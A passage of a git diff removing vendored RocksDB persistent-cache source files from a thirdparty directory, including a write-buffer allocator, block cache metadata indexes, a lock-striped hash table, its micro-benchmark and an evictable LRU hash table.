-    bool signal_ = false;                    // signal to exit thread loop
-    std::function<void()> callback_;         // Callback on completion
-  };
-
-  explicit ThreadedWriter(PersistentCacheTier* const cache, const size_t qdepth,
-                          const size_t io_size);
-  virtual ~ThreadedWriter() { assert(threads_.empty()); }
-
-  void Stop() override;
-  void Write(WritableFile* const file, CacheWriteBuffer* buf,
-             const uint64_t file_off,
-             const std::function<void()> callback) override;
-
- private:
-  void ThreadMain();
-  void DispatchIO(const IO& io);
-
-  const size_t io_size_ = 0;
-  BoundedQueue<IO> q_;
-  std::vector<port::Thread> threads_;
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file_buffer.h b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file_buffer.h
deleted file mode 100644
index 9d9465c..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file_buffer.h
+++ /dev/null
@@ -1,127 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <list>
-#include <memory>
-#include <string>
-
-#include "include/rocksdb/comparator.h"
-#include "util/arena.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-//
-// CacheWriteBuffer
-//
-// Buffer abstraction that can be manipulated via append
-// (not thread safe)
-class CacheWriteBuffer {
- public:
-  explicit CacheWriteBuffer(const size_t size) : size_(size), pos_(0) {
-    buf_.reset(new char[size_]);
-    assert(!pos_);
-    assert(size_);
-  }
-
-  virtual ~CacheWriteBuffer() {}
-
-  void Append(const char* buf, const size_t size) {
-    assert(pos_ + size <= size_);
-    memcpy(buf_.get() + pos_, buf, size);
-    pos_ += size;
-    assert(pos_ <= size_);
-  }
-
-  void FillTrailingZeros() {
-    assert(pos_ <= size_);
-    memset(buf_.get() + pos_, '0', size_ - pos_);
-    pos_ = size_;
-  }
-
-  void Reset() { pos_ = 0; }
-  size_t Free() const { return size_ - pos_; }
-  size_t Capacity() const { return size_; }
-  size_t Used() const { return pos_; }
-  char* Data() const { return buf_.get(); }
-
- private:
-  std::unique_ptr<char[]> buf_;
-  const size_t size_;
-  size_t pos_;
-};
-
-//
-// CacheWriteBufferAllocator
-//
-// Buffer pool abstraction(not thread safe)
-//
-class CacheWriteBufferAllocator {
- public:
-  explicit CacheWriteBufferAllocator(const size_t buffer_size,
-                                     const size_t buffer_count)
-      : cond_empty_(&lock_), buffer_size_(buffer_size) {
-    MutexLock _(&lock_);
-    buffer_size_ = buffer_size;
-    for (uint32_t i = 0; i < buffer_count; i++) {
-      auto* buf = new CacheWriteBuffer(buffer_size_);
-      assert(buf);
-      if (buf) {
-        bufs_.push_back(buf);
-        cond_empty_.Signal();
-      }
-    }
-  }
-
-  virtual ~CacheWriteBufferAllocator() {
-    MutexLock _(&lock_);
-    assert(bufs_.size() * buffer_size_ == Capacity());
-    for (auto* buf : bufs_) {
-      delete buf;
-    }
-    bufs_.clear();
-  }
-
-  CacheWriteBuffer* Allocate() {
-    MutexLock _(&lock_);
-    if (bufs_.empty()) {
-      return nullptr;
-    }
-
-    assert(!bufs_.empty());
-    CacheWriteBuffer* const buf = bufs_.front();
-    bufs_.pop_front();
-    return buf;
-  }
-
-  void Deallocate(CacheWriteBuffer* const buf) {
-    assert(buf);
-    MutexLock _(&lock_);
-    buf->Reset();
-    bufs_.push_back(buf);
-    cond_empty_.Signal();
-  }
-
-  void WaitUntilUsable() {
-    // We are asked to wait till we have buffers available
-    MutexLock _(&lock_);
-    while (bufs_.empty()) {
-      cond_empty_.Wait();
-    }
-  }
-
-  size_t Capacity() const { return bufs_.size() * buffer_size_; }
-  size_t Free() const { return bufs_.size() * buffer_size_; }
-  size_t BufferSize() const { return buffer_size_; }
-
- private:
-  port::Mutex lock_;                   // Sync lock
-  port::CondVar cond_empty_;           // Condition var for empty buffers
-  size_t buffer_size_;                 // Size of each buffer
-  std::list<CacheWriteBuffer*> bufs_;  // Buffer stash
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.cc b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.cc
deleted file mode 100644
index 84d901b..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.cc
+++ /dev/null
@@ -1,85 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/block_cache_tier_metadata.h"
-
-#include <functional>
-
-namespace rocksdb {
-
-bool BlockCacheTierMetadata::Insert(BlockCacheFile* file) {
-  return cache_file_index_.Insert(file);
-}
-
-BlockCacheFile* BlockCacheTierMetadata::Lookup(const uint32_t cache_id) {
-  BlockCacheFile* ret = nullptr;
-  BlockCacheFile lookup_key(cache_id);
-  bool ok = cache_file_index_.Find(&lookup_key, &ret);
-  if (ok) {
-    assert(ret->refs_);
-    return ret;
-  }
-  return nullptr;
-}
-
-BlockCacheFile* BlockCacheTierMetadata::Evict() {
-  using std::placeholders::_1;
-  auto fn = std::bind(&BlockCacheTierMetadata::RemoveAllKeys, this, _1);
-  return cache_file_index_.Evict(fn);
-}
-
-void BlockCacheTierMetadata::Clear() {
-  cache_file_index_.Clear([](BlockCacheFile* arg){ delete arg; });
-  block_index_.Clear([](BlockInfo* arg){ delete arg; });
-}
-
-BlockInfo* BlockCacheTierMetadata::Insert(const Slice& key, const LBA& lba) {
-  std::unique_ptr<BlockInfo> binfo(new BlockInfo(key, lba));
-  if (!block_index_.Insert(binfo.get())) {
-    return nullptr;
-  }
-  return binfo.release();
-}
-
-bool BlockCacheTierMetadata::Lookup(const Slice& key, LBA* lba) {
-  BlockInfo lookup_key(key);
-  BlockInfo* block;
-  port::RWMutex* rlock = nullptr;
-  if (!block_index_.Find(&lookup_key, &block, &rlock)) {
-    return false;
-  }
-
-  ReadUnlock _(rlock);
-  assert(block->key_ == key.ToString());
-  if (lba) {
-    *lba = block->lba_;
-  }
-  return true;
-}
-
-BlockInfo* BlockCacheTierMetadata::Remove(const Slice& key) {
-  BlockInfo lookup_key(key);
-  BlockInfo* binfo = nullptr;
-  bool ok __attribute__((__unused__)) = block_index_.Erase(&lookup_key, &binfo);
-  assert(ok);
-  return binfo;
-}
-
-void BlockCacheTierMetadata::RemoveAllKeys(BlockCacheFile* f) {
-  for (BlockInfo* binfo : f->block_infos()) {
-    BlockInfo* tmp = nullptr;
-    bool status = block_index_.Erase(binfo, &tmp);
-    (void)status;
-    assert(status);
-    assert(tmp == binfo);
-    delete binfo;
-  }
-  f->block_infos().clear();
-}
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.h b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.h
deleted file mode 100644
index 14082bb..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_metadata.h
+++ /dev/null
@@ -1,125 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/slice.h"
-
-#include "utilities/persistent_cache/block_cache_tier_file.h"
-#include "utilities/persistent_cache/hash_table.h"
-#include "utilities/persistent_cache/hash_table_evictable.h"
-#include "utilities/persistent_cache/lrulist.h"
-
-namespace rocksdb {
-
-//
-// Block Cache Tier Metadata
-//
-// The BlockCacheTierMetadata holds all the metadata associated with block
-// cache. It
-// fundamentally contains 2 indexes and an LRU.
-//
-// Block Cache Index
-//
-// This is a forward index that maps a given key to a LBA (Logical Block
-// Address). LBA is a disk pointer that points to a record on the cache.
-//
-// LBA = { cache-id, offset, size }
-//
-// Cache File Index
-//
-// This is a forward index that maps a given cache-id to a cache file object.
-// Typically you would lookup using LBA and use the object to read or write
-struct BlockInfo {
-  explicit BlockInfo(const Slice& key, const LBA& lba = LBA())
-      : key_(key.ToString()), lba_(lba) {}
-
-  std::string key_;
-  LBA lba_;
-};
-
-class BlockCacheTierMetadata {
- public:
-  explicit BlockCacheTierMetadata(const uint32_t blocks_capacity = 1024 * 1024,
-                                  const uint32_t cachefile_capacity = 10 * 1024)
-      : cache_file_index_(cachefile_capacity), block_index_(blocks_capacity) {}
-
-  virtual ~BlockCacheTierMetadata() {}
-
-  // Insert a given cache file
-  bool Insert(BlockCacheFile* file);
-
-  // Lookup cache file based on cache_id
-  BlockCacheFile* Lookup(const uint32_t cache_id);
-
-  // Insert block information to block index
-  BlockInfo* Insert(const Slice& key, const LBA& lba);
-  // bool Insert(BlockInfo* binfo);
-
-  // Lookup block information from block index
-  bool Lookup(const Slice& key, LBA* lba);
-
-  // Remove a given from the block index
-  BlockInfo* Remove(const Slice& key);
-
-  // Find and evict a cache file using LRU policy
-  BlockCacheFile* Evict();
-
-  // Clear the metadata contents
-  virtual void Clear();
-
- protected:
-  // Remove all block information from a given file
-  virtual void RemoveAllKeys(BlockCacheFile* file);
-
- private:
-  // Cache file index definition
-  //
-  // cache-id => BlockCacheFile
-  struct BlockCacheFileHash {
-    uint64_t operator()(const BlockCacheFile* rec) {
-      return std::hash<uint32_t>()(rec->cacheid());
-    }
-  };
-
-  struct BlockCacheFileEqual {
-    uint64_t operator()(const BlockCacheFile* lhs, const BlockCacheFile* rhs) {
-      return lhs->cacheid() == rhs->cacheid();
-    }
-  };
-
-  typedef EvictableHashTable<BlockCacheFile, BlockCacheFileHash,
-                             BlockCacheFileEqual>
-      CacheFileIndexType;
-
-  // Block Lookup Index
-  //
-  // key => LBA
-  struct Hash {
-    size_t operator()(BlockInfo* node) const {
-      return std::hash<std::string>()(node->key_);
-    }
-  };
-
-  struct Equal {
-    size_t operator()(BlockInfo* lhs, BlockInfo* rhs) const {
-      return lhs->key_ == rhs->key_;
-    }
-  };
-
-  typedef HashTable<BlockInfo*, Hash, Equal> BlockIndexType;
-
-  CacheFileIndexType cache_file_index_;
-  BlockIndexType block_index_;
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/hash_table.h b/thirdparty/rocksdb/utilities/persistent_cache/hash_table.h
deleted file mode 100644
index 36d8327..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/hash_table.h
+++ /dev/null
@@ -1,238 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <assert.h>
-#include <list>
-#include <vector>
-
-#ifdef OS_LINUX
-#include <sys/mman.h>
-#endif
-
-#include "include/rocksdb/env.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-// HashTable<T, Hash, Equal>
-//
-// Traditional implementation of hash table with synchronization built on top
-// don't perform very well in multi-core scenarios. This is an implementation
-// designed for multi-core scenarios with high lock contention.
-//
-//                         |<-------- alpha ------------->|
-//               Buckets   Collision list
-//          ---- +----+    +---+---+--- ...... ---+---+---+
-//         /     |    |--->|   |   |              |   |   |
-//        /      +----+    +---+---+--- ...... ---+---+---+
-//       /       |    |
-// Locks/        +----+
-// +--+/         .    .
-// |  |          .    .
-// +--+          .    .
-// |  |          .    .
-// +--+          .    .
-// |  |          .    .
-// +--+          .    .
-//     \         +----+
-//      \        |    |
-//       \       +----+
-//        \      |    |
-//         \---- +----+
-//
-// The lock contention is spread over an array of locks. This helps improve
-// concurrent access. The spine is designed for a certain capacity and load
-// factor. When the capacity planning is done correctly we can expect
-// O(load_factor = 1) insert, access and remove time.
-//
-// Micro benchmark on debug build gives about .5 Million/sec rate of insert,
-// erase and lookup in parallel (total of about 1.5 Million ops/sec). If the
-// blocks were of 4K, the hash table can support  a virtual throughput of
-// 6 GB/s.
-//
-// T      Object type (contains both key and value)
-// Hash   Function that returns an hash from type T
-// Equal  Returns if two objects are equal
-//        (We need explicit equal for pointer type)
-//
-template <class T, class Hash, class Equal>
-class HashTable {
- public:
-  explicit HashTable(const size_t capacity = 1024 * 1024,
-                     const float load_factor = 2.0, const uint32_t nlocks = 256)
-      : nbuckets_(
-            static_cast<uint32_t>(load_factor ? capacity / load_factor : 0)),
-        nlocks_(nlocks) {
-    // pre-conditions
-    assert(capacity);
-    assert(load_factor);
-    assert(nbuckets_);
-    assert(nlocks_);
-
-    buckets_.reset(new Bucket[nbuckets_]);
-#ifdef OS_LINUX
-    mlock(buckets_.get(), nbuckets_ * sizeof(Bucket));
-#endif
-
-    // initialize locks
-    locks_.reset(new port::RWMutex[nlocks_]);
-#ifdef OS_LINUX
-    mlock(locks_.get(), nlocks_ * sizeof(port::RWMutex));
-#endif
-
-    // post-conditions
-    assert(buckets_);
-    assert(locks_);
-  }
-
-  virtual ~HashTable() { AssertEmptyBuckets(); }
-
-  //
-  // Insert given record to hash table
-  //
-  bool Insert(const T& t) {
-    const uint64_t h = Hash()(t);
-    const uint32_t bucket_idx = h % nbuckets_;
-    const uint32_t lock_idx = bucket_idx % nlocks_;
-
-    WriteLock _(&locks_[lock_idx]);
-    auto& bucket = buckets_[bucket_idx];
-    return Insert(&bucket, t);
-  }
-
-  // Lookup hash table
-  //
-  // Please note that read lock should be held by the caller. This is because
-  // the caller owns the data, and should hold the read lock as long as he
-  // operates on the data.
-  bool Find(const T& t, T* ret, port::RWMutex** ret_lock) {
-    const uint64_t h = Hash()(t);
-    const uint32_t bucket_idx = h % nbuckets_;
-    const uint32_t lock_idx = bucket_idx % nlocks_;
-
-    port::RWMutex& lock = locks_[lock_idx];
-    lock.ReadLock();
-
-    auto& bucket = buckets_[bucket_idx];
-    if (Find(&bucket, t, ret)) {
-      *ret_lock = &lock;
-      return true;
-    }
-
-    lock.ReadUnlock();
-    return false;
-  }
-
-  //
-  // Erase a given key from the hash table
-  //
-  bool Erase(const T& t, T* ret) {
-    const uint64_t h = Hash()(t);
-    const uint32_t bucket_idx = h % nbuckets_;
-    const uint32_t lock_idx = bucket_idx % nlocks_;
-
-    WriteLock _(&locks_[lock_idx]);
-
-    auto& bucket = buckets_[bucket_idx];
-    return Erase(&bucket, t, ret);
-  }
-
-  // Fetch the mutex associated with a key
-  // This call is used to hold the lock for a given data for extended period of
-  // time.
-  port::RWMutex* GetMutex(const T& t) {
-    const uint64_t h = Hash()(t);
-    const uint32_t bucket_idx = h % nbuckets_;
-    const uint32_t lock_idx = bucket_idx % nlocks_;
-
-    return &locks_[lock_idx];
-  }
-
-  void Clear(void (*fn)(T)) {
-    for (uint32_t i = 0; i < nbuckets_; ++i) {
-      const uint32_t lock_idx = i % nlocks_;
-      WriteLock _(&locks_[lock_idx]);
-      for (auto& t : buckets_[i].list_) {
-        (*fn)(t);
-      }
-      buckets_[i].list_.clear();
-    }
-  }
-
- protected:
-  // Models bucket of keys that hash to the same bucket number
-  struct Bucket {
-    std::list<T> list_;
-  };
-
-  // Substitute for std::find with custom comparator operator
-  typename std::list<T>::iterator Find(std::list<T>* list, const T& t) {
-    for (auto it = list->begin(); it != list->end(); ++it) {
-      if (Equal()(*it, t)) {
-        return it;
-      }
-    }
-    return list->end();
-  }
-
-  bool Insert(Bucket* bucket, const T& t) {
-    // Check if the key already exists
-    auto it = Find(&bucket->list_, t);
-    if (it != bucket->list_.end()) {
-      return false;
-    }
-
-    // insert to bucket
-    bucket->list_.push_back(t);
-    return true;
-  }
-
-  bool Find(Bucket* bucket, const T& t, T* ret) {
-    auto it = Find(&bucket->list_, t);
-    if (it != bucket->list_.end()) {
-      if (ret) {
-        *ret = *it;
-      }
-      return true;
-    }
-    return false;
-  }
-
-  bool Erase(Bucket* bucket, const T& t, T* ret) {
-    auto it = Find(&bucket->list_, t);
-    if (it != bucket->list_.end()) {
-      if (ret) {
-        *ret = *it;
-      }
-
-      bucket->list_.erase(it);
-      return true;
-    }
-    return false;
-  }
-
-  // assert that all buckets are empty
-  void AssertEmptyBuckets() {
-#ifndef NDEBUG
-    for (size_t i = 0; i < nbuckets_; ++i) {
-      WriteLock _(&locks_[i % nlocks_]);
-      assert(buckets_[i].list_.empty());
-    }
-#endif
-  }
-
-  const uint32_t nbuckets_;                 // No. of buckets in the spine
-  std::unique_ptr<Bucket[]> buckets_;       // Spine of the hash buckets
-  const uint32_t nlocks_;                   // No. of locks
-  std::unique_ptr<port::RWMutex[]> locks_;  // Granular locks
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_bench.cc b/thirdparty/rocksdb/utilities/persistent_cache/hash_table_bench.cc
deleted file mode 100644
index 65bcd77..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_bench.cc
+++ /dev/null
@@ -1,303 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#if !defined(OS_WIN) && !defined(ROCKSDB_LITE)
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() { fprintf(stderr, "Please install gflags to run tools\n"); }
-#else
-#include <gflags/gflags.h>
-
-#include <atomic>
-#include <functional>
-#include <string>
-#include <unordered_map>
-
-#include "port/port_posix.h"
-#include "rocksdb/env.h"
-#include "util/mutexlock.h"
-#include "utilities/persistent_cache/hash_table.h"
-
-using std::string;
-
-DEFINE_int32(nsec, 10, "nsec");
-DEFINE_int32(nthread_write, 1, "insert %");
-DEFINE_int32(nthread_read, 1, "lookup %");
-DEFINE_int32(nthread_erase, 1, "erase %");
-
-namespace rocksdb {
-
-//
-// HashTableImpl interface
-//
-// Abstraction of a hash table implementation
-template <class Key, class Value>
-class HashTableImpl {
- public:
-  virtual ~HashTableImpl() {}
-
-  virtual bool Insert(const Key& key, const Value& val) = 0;
-  virtual bool Erase(const Key& key) = 0;
-  virtual bool Lookup(const Key& key, Value* val) = 0;
-};
-
-// HashTableBenchmark
-//
-// Abstraction to test a given hash table implementation. The test mostly
-// focus on insert, lookup and erase. The test can operate in test mode and
-// benchmark mode.
-class HashTableBenchmark {
- public:
-  explicit HashTableBenchmark(HashTableImpl<size_t, std::string>* impl,
-                              const size_t sec = 10,
-                              const size_t nthread_write = 1,
-                              const size_t nthread_read = 1,
-                              const size_t nthread_erase = 1)
-      : impl_(impl),
-        sec_(sec),
-        ninserts_(0),
-        nreads_(0),
-        nerases_(0),
-        nerases_failed_(0),
-        quit_(false) {
-    Prepop();
-
-    StartThreads(nthread_write, WriteMain);
-    StartThreads(nthread_read, ReadMain);
-    StartThreads(nthread_erase, EraseMain);
-
-    uint64_t start = NowInMillSec();
-    while (!quit_) {
-      quit_ = NowInMillSec() - start > sec_ * 1000;
-      /* sleep override */ sleep(1);
-    }
-
-    Env* env = Env::Default();
-    env->WaitForJoin();
-
-    if (sec_) {
-      printf("Result \n");
-      printf("====== \n");
-      printf("insert/sec = %f \n", ninserts_ / static_cast<double>(sec_));
-      printf("read/sec = %f \n", nreads_ / static_cast<double>(sec_));
-      printf("erases/sec = %f \n", nerases_ / static_cast<double>(sec_));
-      const uint64_t ops = ninserts_ + nreads_ + nerases_;
-      printf("ops/sec = %f \n", ops / static_cast<double>(sec_));
-      printf("erase fail = %d (%f%%)\n", static_cast<int>(nerases_failed_),
-             static_cast<float>(nerases_failed_ / nerases_ * 100));
-      printf("====== \n");
-    }
-  }
-
-  void RunWrite() {
-    while (!quit_) {
-      size_t k = insert_key_++;
-      std::string tmp(1000, k % 255);
-      bool status = impl_->Insert(k, tmp);
-      assert(status);
-      ninserts_++;
-    }
-  }
-
-  void RunRead() {
-    Random64 rgen(time(nullptr));
-    while (!quit_) {
-      std::string s;
-      size_t k = rgen.Next() % max_prepop_key;
-      bool status = impl_->Lookup(k, &s);
-      assert(status);
-      assert(s == std::string(1000, k % 255));
-      nreads_++;
-    }
-  }
-
-  void RunErase() {
-    while (!quit_) {
-      size_t k = erase_key_++;
-      bool status = impl_->Erase(k);
-      nerases_failed_ += !status;
-      nerases_++;
-    }
-  }
-
- private:
-  // Start threads for a given function
-  void StartThreads(const size_t n, void (*fn)(void*)) {
-    Env* env = Env::Default();
-    for (size_t i = 0; i < n; ++i) {
-      env->StartThread(fn, this);
-    }
-  }
-
-  // Prepop the hash table with 1M keys
-  void Prepop() {
-    for (size_t i = 0; i < max_prepop_key; ++i) {
-      bool status = impl_->Insert(i, std::string(1000, i % 255));
-      assert(status);
-    }
-
-    erase_key_ = insert_key_ = max_prepop_key;
-
-    for (size_t i = 0; i < 10 * max_prepop_key; ++i) {
-      bool status = impl_->Insert(insert_key_++, std::string(1000, 'x'));
-      assert(status);
-    }
-  }
-
-  static uint64_t NowInMillSec() {
-    timeval tv;
-    gettimeofday(&tv, /*tz=*/nullptr);
-    return tv.tv_sec * 1000 + tv.tv_usec / 1000;
-  }
-
-  //
-  //  Wrapper functions for thread entry
-  //
-  static void WriteMain(void* args) {
-    reinterpret_cast<HashTableBenchmark*>(args)->RunWrite();
-  }
-
-  static void ReadMain(void* args) {
-    reinterpret_cast<HashTableBenchmark*>(args)->RunRead();
-  }
-
-  static void EraseMain(void* args) {
-    reinterpret_cast<HashTableBenchmark*>(args)->RunErase();
-  }
-
-  HashTableImpl<size_t, std::string>* impl_;         // Implementation to test
-  const size_t sec_;                                 // Test time
-  const size_t max_prepop_key = 1ULL * 1024 * 1024;  // Max prepop key
-  std::atomic<size_t> insert_key_;                   // Last inserted key
-  std::atomic<size_t> erase_key_;                    // Erase key
-  std::atomic<size_t> ninserts_;                     // Number of inserts
-  std::atomic<size_t> nreads_;                       // Number of reads
-  std::atomic<size_t> nerases_;                      // Number of erases
-  std::atomic<size_t> nerases_failed_;               // Number of erases failed
-  bool quit_;  // Should the threads quit ?
-};
-
-//
-// SimpleImpl
-// Lock safe unordered_map implementation
-class SimpleImpl : public HashTableImpl<size_t, string> {
- public:
-  bool Insert(const size_t& key, const string& val) override {
-    WriteLock _(&rwlock_);
-    map_.insert(make_pair(key, val));
-    return true;
-  }
-
-  bool Erase(const size_t& key) override {
-    WriteLock _(&rwlock_);
-    auto it = map_.find(key);
-    if (it == map_.end()) {
-      return false;
-    }
-    map_.erase(it);
-    return true;
-  }
-
-  bool Lookup(const size_t& key, string* val) override {
-    ReadLock _(&rwlock_);
-    auto it = map_.find(key);
-    if (it != map_.end()) {
-      *val = it->second;
-    }
-    return it != map_.end();
-  }
-
- private:
-  port::RWMutex rwlock_;
-  std::unordered_map<size_t, string> map_;
-};
-
-//
-// GranularLockImpl
-// Thread safe custom RocksDB implementation of hash table with granular
-// locking
-class GranularLockImpl : public HashTableImpl<size_t, string> {
- public:
-  bool Insert(const size_t& key, const string& val) override {
-    Node n(key, val);
-    return impl_.Insert(n);
-  }
-
-  bool Erase(const size_t& key) override {
-    Node n(key, string());
-    return impl_.Erase(n, nullptr);
-  }
-
-  bool Lookup(const size_t& key, string* val) override {
-    Node n(key, string());
-    port::RWMutex* rlock;
-    bool status = impl_.Find(n, &n, &rlock);
-    if (status) {
-      ReadUnlock _(rlock);
-      *val = n.val_;
-    }
-    return status;
-  }
-
- private:
-  struct Node {
-    explicit Node(const size_t key, const string& val) : key_(key), val_(val) {}
-
-    size_t key_ = 0;
-    string val_;
-  };
-
-  struct Hash {
-    uint64_t operator()(const Node& node) {
-      return std::hash<uint64_t>()(node.key_);
-    }
-  };
-
-  struct Equal {
-    bool operator()(const Node& lhs, const Node& rhs) {
-      return lhs.key_ == rhs.key_;
-    }
-  };
-
-  HashTable<Node, Hash, Equal> impl_;
-};
-
-}  // namespace rocksdb
-
-//
-// main
-//
-int main(int argc, char** argv) {
-  GFLAGS::SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                          " [OPTIONS]...");
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, false);
-
-  //
-  // Micro benchmark unordered_map
-  //
-  printf("Micro benchmarking std::unordered_map \n");
-  {
-    rocksdb::SimpleImpl impl;
-    rocksdb::HashTableBenchmark _(&impl, FLAGS_nsec, FLAGS_nthread_write,
-                                  FLAGS_nthread_read, FLAGS_nthread_erase);
-  }
-  //
-  // Micro benchmark scalable hash table
-  //
-  printf("Micro benchmarking scalable hash map \n");
-  {
-    rocksdb::GranularLockImpl impl;
-    rocksdb::HashTableBenchmark _(&impl, FLAGS_nsec, FLAGS_nthread_write,
-                                  FLAGS_nthread_read, FLAGS_nthread_erase);
-  }
-
-  return 0;
-}
-#endif  // #ifndef GFLAGS
-#else
-int main(int /*argc*/, char** /*argv*/) { return 0; }
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_evictable.h b/thirdparty/rocksdb/utilities/persistent_cache/hash_table_evictable.h
deleted file mode 100644
index 6557eb4..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_evictable.h
+++ /dev/null
@@ -1,168 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-
-#include "util/random.h"
-#include "utilities/persistent_cache/hash_table.h"
-#include "utilities/persistent_cache/lrulist.h"
-
-namespace rocksdb {
-
-// Evictable Hash Table
-//
-// Hash table index where least accessed (or one of the least accessed) elements
-// can be evicted.
-//
-// Please note EvictableHashTable can only be created for pointer type objects
-template <class T, class Hash, class Equal>
-class EvictableHashTable : private HashTable<T*, Hash, Equal> {
- public:
-  typedef HashTable<T*, Hash, Equal> hash_table;
-
-  explicit EvictableHashTable(const size_t capacity = 1024 * 1024,
-                              const float load_factor = 2.0,
-                              const uint32_t nlocks = 256)
-      : HashTable<T*, Hash, Equal>(capacity, load_factor, nlocks),
-        lru_lists_(new LRUList<T>[hash_table::nlocks_]) {
-    assert(lru_lists_);
-  }
-
-  virtual ~EvictableHashTable() { AssertEmptyLRU(); }
-
-  //
-  // Insert given record to hash table (and LRU list)
-  //
-  bool Insert(T* t) {
-    const uint64_t h = Hash()(t);
-    typename hash_table::Bucket& bucket = GetBucket(h);
-    LRUListType& lru = GetLRUList(h);
-    port::RWMutex& lock = GetMutex(h);
-
-    WriteLock _(&lock);
-    if (hash_table::Insert(&bucket, t)) {
-      lru.Push(t);
-      return true;
-    }
-    return false;
-  }
-
-  //
-  // Lookup hash table
-  //
-  // Please note that read lock should be held by the caller. This is because
-  // the caller owns the data, and should hold the read lock as long as he
-  // operates on the data.
-  bool Find(T* t, T** ret) {
-    const uint64_t h = Hash()(t);
-    typename hash_table::Bucket& bucket = GetBucket(h);
-    LRUListType& lru = GetLRUList(h);
-    port::RWMutex& lock = GetMutex(h);
-
-    ReadLock _(&lock);
-    if (hash_table::Find(&bucket, t, ret)) {
-      ++(*ret)->refs_;
-      lru.Touch(*ret);
-      return true;
-    }
-    return false;
-  }
-
-  //
-  // Evict one of the least recently used object
-  //
-  T* Evict(const std::function<void(T*)>& fn = nullptr) {
-    uint32_t random = Random::GetTLSInstance()->Next();
-    const size_t start_idx = random % hash_table::nlocks_;
-    T* t = nullptr;
-
-    // iterate from start_idx .. 0 .. start_idx
-    for (size_t i = 0; !t && i < hash_table::nlocks_; ++i) {
-      const size_t idx = (start_idx + i) % hash_table::nlocks_;
-
-      WriteLock _(&hash_table::locks_[idx]);
-      LRUListType& lru = lru_lists_[idx];
-      if (!lru.IsEmpty() && (t = lru.Pop())) {
-        assert(!t->refs_);
-        // We got an item to evict, erase from the bucket
-        const uint64_t h = Hash()(t);
-        typename hash_table::Bucket& bucket = GetBucket(h);
-        T* tmp = nullptr;
-        bool status = hash_table::Erase(&bucket, t, &tmp);
-        assert(t == tmp);
-        (void)status;
-        assert(status);
-        if (fn) {
-          fn(t);
-        }
-        break;
-      }
-      assert(!t);
-    }
-    return t;
-  }
-
-  void Clear(void (*fn)(T*)) {
-    for (uint32_t i = 0; i < hash_table::nbuckets_; ++i) {
-      const uint32_t lock_idx = i % hash_table::nlocks_;
-      WriteLock _(&hash_table::locks_[lock_idx]);
-      auto& lru_list = lru_lists_[lock_idx];
-      auto& bucket = hash_table::buckets_[i];
-      for (auto* t : bucket.list_) {
-        lru_list.Unlink(t);
-        (*fn)(t);
-      }
-      bucket.list_.clear();
-    }
-    // make sure that all LRU lists are emptied
-    AssertEmptyLRU();
-  }
-
-  void AssertEmptyLRU() {
-#ifndef NDEBUG
-    for (uint32_t i = 0; i < hash_table::nlocks_; ++i) {
-      WriteLock _(&hash_table::locks_[i]);
-      auto& lru_list = lru_lists_[i];
-      assert(lru_list.IsEmpty());
-    }
-#endif
-  }
-
-  //
-  // Fetch the mutex associated with a key
-  // This call is used to hold the lock for a given data for extended period of
-  // time.
-  port::RWMutex* GetMutex(T* t) { return hash_table::GetMutex(t); }
-
- private:
-  typedef LRUList<T> LRUListType;
-
-  typename hash_table::Bucket& GetBucket(const uint64_t h) {
-    const uint32_t bucket_idx = h % hash_table::nbuckets_;
-    return hash_table::buckets_[bucket_idx];
-  }
-
-  LRUListType& GetLRUList(const uint64_t h) {
